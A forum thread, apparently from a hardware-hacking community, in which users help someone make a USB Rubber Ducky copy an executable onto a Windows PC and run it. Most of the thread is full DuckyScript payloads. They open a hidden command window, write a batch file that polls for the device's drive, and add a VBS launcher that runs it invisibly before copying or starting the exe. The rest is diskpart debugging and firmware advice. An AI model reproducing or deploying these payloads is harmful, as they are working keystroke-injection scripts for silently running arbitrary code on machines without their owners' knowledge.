plz help me. Copy to * and run it.

[freeze]

yesterday buy it... and i need help.

How do with this usb: copy *.exe to (for expl:C:\1.exe) and run 1.exe.

how?

Thanks.

[Rkiver]

A very quick google shows the following: https://github.com/hak5darren/USB-Rubber-Ducky/wiki/Payload---copy-file-to-desktop

REM Author: overwraith
REM Name: CopyFileToDesktop.txt
REM Purpose: Wait for ducky mass storage to mount, then copy file to desktop. 
REM Encoder V2.4
REM Using the run command for a broader OS base. 
DEFAULT_DELAY 75
DELAY 3000
GUI r
DELAY 1000
STRING cmd /Q /D /T:7F /F:OFF /V:ON /K
DELAY 500
ENTER
DELAY 750
ALT SPACE
STRING M
DOWNARROW
REPEAT 100
ENTER

REM Change directories because System32 appears to be protected. 
STRING CD %TEMP%
ENTER

REM Make batch file that waits for SD card to mount. 
REM Delete batch file if already exists
STRING erase /Q DuckyWait.bat
ENTER
STRING copy con DuckyWait.bat
ENTER
REM DuckyWait.bat
STRING :while1
ENTER
STRING for /f "tokens=3 delims= " %%A in ('echo list volume ^| diskpart ^| findstr "DUCKY"') do (set DUCKYdrive=%%A:)
ENTER
STRING if Exist %DUCKYdrive% (
ENTER
STRING goto :break
ENTER
STRING )
ENTER
STRING timeout /t 30
ENTER
STRING goto :while1
ENTER
STRING :break
ENTER
REM Continue script.
REM Remove the next two lines if you don't place your payloads in separate folders. 
STRING set DUCKYdrive=%DUCKYdrive%\CopyFileToDesktop\
ENTER
STRING copy %DUCKYdrive%HelloWorld.exe %userprofile%\Desktop\HelloWorld.exe
ENTER
CONTROL z
ENTER

REM MAKE THE VBS FILE THAT ALLOWS RUNNING INVISIBLY.
REM Delete vbs file if already exists
STRING erase /Q invis.vbs
ENTER
REM FROM: http://stackoverflow.com/questions/289498/running-batch-file-in-background-when-windows-boots-up
STRING copy con invis.vbs
ENTER
STRING CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False
ENTER
CONTROL z
ENTER

REM RUN THE BATCH FILE
STRING wscript.exe invis.vbs DuckyWait.bat
ENTER
STRING EXIT
ENTER

[freeze]

What is the problem?

[freeze]

Use script:

REM Author: overwraith
REM Name: RunEXE_V2.txt
REM Purpose: Run an executable file off of the SD card after it mounts. Uses googleknowsbest's slightly more portable method to find the "Ducky" drive.
REM Encoder V2.4
REM Using the run command for a broader OS base.
DEFAULT_DELAY 75
DELAY 3000
GUI r
DELAY 1000
STRING cmd /Q /D /T:7F /F:OFF /V:ON /K
DELAY 500
ENTER
DELAY 750
ALT SPACE
STRING M
DOWNARROW
REPEAT 100
ENTER

REM Change directories because System32 appears to be protected.
STRING CD %TEMP%
ENTER

REM Make batch file that waits for SD card to mount.
REM Delete batch file if already exists
STRING erase /Q DuckyWait.bat
ENTER
STRING copy con DuckyWait.bat
ENTER
REM DuckyWait.bat
STRING :while1
ENTER
STRING for /f "tokens=3 delims= " %%A in ('echo list volume ^| diskpart ^| findstr "DUCKY"') do (set DUCKYdrive=%%A:)
ENTER
STRING if Exist %DUCKYdrive% (
ENTER
STRING goto :break
ENTER
STRING )
ENTER
STRING timeout /t 30
ENTER
STRING goto :while1
ENTER
STRING :break
ENTER
REM Continue script.
STRING START %DUCKYdrive%\HelloWorld.exe
ENTER
CONTROL z
ENTER

REM MAKE THE VBS FILE THAT ALLOWS RUNNING INVISIBLY.
REM Delete vbs file if already exists
STRING erase /Q invis.vbs
ENTER
REM FROM: http://stackoverflow.com/questions/289498/running-batch-file-in-background-when-windows-boots-up
STRING copy con invis.vbs
ENTER
STRING CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False
ENTER
CONTROL Z
ENTER

REM RUN THE BATCH FILE
STRING wscript.exe invis.vbs DuckyWait.bat
ENTER
REM STRING EXIT
REM ENTER

And nothing happens ...

[freeze]

What the problem at this script?

C:\Documents and Settings\Administrator>CD %TEMP%

C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp>erase /Q DuckyWait.bat

C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp>copy con DuckyWait.bat
:while1
for /f "tokens=3 delims= " %%A in ('echo list volume ^| diskpart ^| findstr "DUC
KY"') do (set DUCKYdrive=%%A:)
if Exist %DUCKYdrive% (
goto :break
)
timeout /t 30
goto :while1
:break
START %DUCKYdrive%\HelloWorld.exe
^Z
1 file(s) copied.

C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp>DuckyWait.bat
The syntax of the command is incorrect.

C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp>

[barry99705]

Looks like it doesn't like something in the batch file.

[freeze]

what I understand from the answer of the console.
I tried all the options autorun. No results.
Specifically, it does not copy a file from a flash card to the PC.

[freeze]

Answers How to copy a file from the ducky?
Not one of the scripts do not do it ..

[fugu]

maybe just try part of the script, without running the duckyscript, but from the cmd line.

echo list volume ^| diskpart ^| findstr "DUCKY"

I think this should display the usb drive info for the ducky when the ducky is plugged in. can you verify?

[freeze]

C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp>echo list volume ^| diskpart ^| findstr "DUCK

Y"

list volume | diskpart | findstr "DUCKY"

C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp>

[overwraith]

I am not sure quite what is wrong, this works on everybody else's computers, but I have some ideas on what could be wrong. I have had instances were websites and forums etc will add newline characters where there shouldn't be any. Make sure that there are no newline characters where there shouldn't be. My lines in my scripts tend to be very long due to the fact that there needs to be an inherent complexity in batch in order to get the same functionality of better programming languages which are unavailable to duckys. Additionally go through the script and the actual output line by line and check to make sure that the script matches up with the actual output, if characters are being skipped then you should be able to see them. A lot of ducky-ing is just debugging. One additional thing that could be happening is that you might not have the correct firmware installed. This script is supposed to run "silently" once the payload has been typed in, so it will wait silently until the drive with the file to copy is plugged in. If you don't have the correct firmware installed on your ducky, then the ducky will not mount the SD, which means the script will essentially run silently forever. If anything else comes to mind I will post back.

[fugu]

I think you may be on to something with copy + paste. Maybe just try typing the command on the command line

diskpart list volume

(i think that's right?)

[freeze]

I think you may be on to something with copy + paste. Maybe just try typing the command on the command line

diskpart list volume

(i think that's right?)

C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp>diskpart list volume

Microsoft DiskPart version 5.1.3565

Copyright (C) 1999-2003 Microsoft Corporation.
On computer: FFA2

DiskPart was unable to process the parameters.
Use 'diskpart /?' for more information.

C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp>

[overwraith]

Actually I think the echo is important, I don't think you can send parameters to diskpart like "list" and "volume".

echo list volume | diskpart

[freeze]

C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp>echo list volume | diskpart

Microsoft DiskPart version 5.1.3565

Copyright (C) 1999-2003 Microsoft Corporation.

On computer: FFA2

DISKPART>

Volume ### Ltr Label Fs Type Size Status Info

---------- --- ----------- ----- ---------- ------- --------- --------

Volume 0 D CD-ROM 0 B

Volume 1 C NTFS Partition 64 GB Healthy System

DISKPART>

C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp>

[overwraith]

In your output diskpart says that the ducky is not connected. Make sure you have the right firmware installed, you need twin duck or something in order for this to work and copy the file to the host computer (I don't remember which of the twin ducks you need, try both of em, takes several seconds to mount the SD). You see, twin duck firmware allows the ducky to mount the micro SD card as mass storage, and simultaneously type like a keyboard, it does not come on the ducky standard. Alternatively you could provide your own flash drive, label it "DUCKY" and put the exe's you want to copy on the flash drive.

Here is where a lot of the firmware looks like it is, I used to get it at ducky decode, but it looks like it has been moved to github.

https://github.com/midnitesnake/usb-rubber-ducky

Here is something on flashing the ducky, can't find the handy dandy word doc that midnight snake made;

https://github.com/midnitesnake/USB-Rubber-Ducky/wiki/Flashing-ducky

In the "CopyFileToDesktop.txt" script it assumes that you want to put your exes in a specific folder on your flash drive/ducky micro SD. Pay particular attention to these particular lines of the script.

REM Remove the next two lines if you don't place your payloads in separate folders.
STRING set DUCKYdrive=%DUCKYdrive%\CopyFileToDesktop\
ENTER
STRING copy %DUCKYdrive%HelloWorld.exe %userprofile%\Desktop\HelloWorld.exe
ENTER

The reason for a lot of the bulk in the script is that you don't necessarily know how long it will take for the ducky to mount the micro sd, so you actually have to wait for it to be connected, essentially polling for it. I think that this problem used to be a lot worse than it is right now, something appears to have gotten faster, or perhaps my computer upgrade has sped things up, I am not sure. There could have been tweaks to the ducky firmware, I am not sure. It at least seems to me that the problem was a lot worse when I was actually coding this script.

Of course you will actually have to modify the copy command in the script to reflect the exe names/exe group, as well as the folder name you decide to stick them in. Pay particular attention to the first line of the previous snippet if you want to place them in a specific folder as you will have to modify the script a little bit. "STRING set DUCKYdrive=%DUCKYdrive%\CopyFileToDesktop\"

Edited June 11, 2015 by overwraith